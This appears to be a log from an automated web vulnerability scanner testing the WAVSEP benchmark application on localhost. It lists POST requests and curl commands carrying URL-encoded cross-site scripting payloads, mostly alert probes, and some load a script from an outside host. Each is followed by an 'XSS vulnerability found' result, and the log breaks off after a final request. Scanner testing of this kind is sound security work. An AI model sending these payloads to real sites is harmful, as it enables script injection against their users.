curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wvl93pulj9%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wcv2a7fsdw%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wcv2a7fsdw%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wo0f8cs1qd%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wo0f8cs1qd%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27w10c4hz6nh%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w10c4hz6nh%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wxmvh4yjs5%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wxmvh4yjs5%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wq0ne245r4%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wq0ne245r4%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wr6s476zgx%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wr6s476zgx%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27ww0tk8zqqt%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27ww0tk8zqqt%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wjt2by86sl%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wjt2by86sl%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22w2dftaxuiq%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22w2dftaxuiq%22%29%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wogqqsz6ew%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wogqqsz6ew%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wugaelmtvg%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wugaelmtvg%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wfzzp3i5jy%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wfzzp3i5jy%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wycz7gewmg%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wycz7gewmg%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wyd4ghkmhy%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wyd4ghkmhy%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wjiivr8h68%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wjiivr8h68%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wmrxon1vgu%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wmrxon1vgu%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27war5jdegxz%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27war5jdegxz%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wgngm9oxny%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wgngm9oxny%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wj5todjj1j%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wj5todjj1j%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wr8lgcc39a%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wr8lgcc39a%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wftd4zcxom%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wftd4zcxom%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27whxwdy3dxl%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27whxwdy3dxl%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27w60wjb54hj%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w60wjb54hj%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd52wzj5zxz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd52wzj5zxz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wvmfgv1yju%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wvmfgv1yju%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbe6exxrntz.js%3E%3C%2Fscript%3E
